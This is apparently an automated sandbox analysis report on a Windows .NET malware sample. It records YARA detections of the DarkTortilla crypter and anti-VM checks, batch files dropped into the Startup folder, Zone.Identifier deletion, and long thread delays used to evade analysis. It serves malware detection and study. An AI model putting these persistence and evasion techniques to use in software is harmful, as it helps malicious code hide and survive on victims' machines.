                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Yara detected DarkTortilla Crypter
                      Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.5660000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.5660000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1761380905.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1773580345.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774284685.0000000005660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: file.exe, i4.cs.Net Code: NewLateBinding.LateCall(Y, (Type)null, "Invoke", new object[1] { (s0E)([SpecialName] () =>{NewLateBinding.LateSet(Y, (Type)null, "SelectionStart", new object[1] { NewLateBinding.LateGet(Y, (Type)null, "TextLength", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);NewLateBinding.LateSet(Y, (Type)null, "SelectionLength", new object[1] { 0 }, (string[])null, (Type[])null);NewLateBinding.LateSet(Y, (Type)null, "SelectionColor", new object[1] { Qf.Value }, (string[])null, (Type[])null);NewLateBinding.LateCall(Y, (Type)null, "AppendText", new object[1] { P_0 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateSet(Y, (Type)null, "SelectionColor", new object[1] { NewLateBinding.LateGet(Y, (Type)null, "ForeColor", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, i4.cs.Net Code: NewLateBinding.LateCall(Y, (Type)null, "Invoke", new object[1] { (s0E)([SpecialName] () =>{NewLateBinding.LateCall(Y, (Type)null, "AppendText", new object[1] { P_0 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C2493 pushfd ; retf 0_2_012C249A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C9B70 push eax; retf 0_2_012C9B71
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C9DA0 push eax; retf 0_2_012C9DA1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0575AF32 push eax; retf 0_2_0575AF3D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05754FE9 push esp; retf 0_2_05754FEA
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057597A8 push esp; iretd 0_2_057597A9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0575FCE3 push esp; ret 0_2_0575FCE9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05EDD7CF push ecx; retf EFCDh0_2_05EDD93A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076D9BF1 push ecx; retf 0046h0_2_076D9C12
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DD9D7 push eax; iretd 0_2_076DD9E6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DB834 pushad ; retf 0_2_076DB88D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07789B8D push ds; retf 0040h0_2_07789BDE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_077872D3 push edi; ret 0_2_077874CE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_077874DC push eax; ret 0_2_0778750D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_077808C1 push ecx; ret 0_2_077808C4
                      Source: file.exeStatic PE information: section name: .text entropy: 7.511723040802468
                      Source: file.exe, Ky1m0L.csHigh entropy of concatenated method names: 'Ps9f8A', 'MoveNext', 'Jb13Hr', 'SetStateMachine', 'a0G3De', 'Sn1y3Q', 'Mi83S', 'j7M1N', 'b4S1N', 'Dw97E'
                      Source: file.exe, Ws1m.csHigh entropy of concatenated method names: 'g1N5Cj', 'Xs7w0W', 'Gf2o0E', 'Gz92Px', 'Ma05Qg', 'w3P8Sz', 'm9GNa8', 'o8HKw7', 'Qa4s3K', 'e1G9Bx'
                      Source: file.exe, No14L.csHigh entropy of concatenated method names: 'Jb', 'Eq', 'Ej34Y', 'Rd30D', 'e8R7W', 'Tx9f6', 'c6XEj', 'Qm5p9', 'y8DNf', 'Kc61G'

                      Boot Survival

                      barindex
                      Drops script or batch files to the startup folder
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.batJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkpj4eLKYuRL6LrNltOgK200.batJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.batJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.batJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkpj4eLKYuRL6LrNltOgK200.batJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\file.exe\:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 8370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A8D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: B8D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 11A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597296Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595435Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595314Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595074Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594968Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
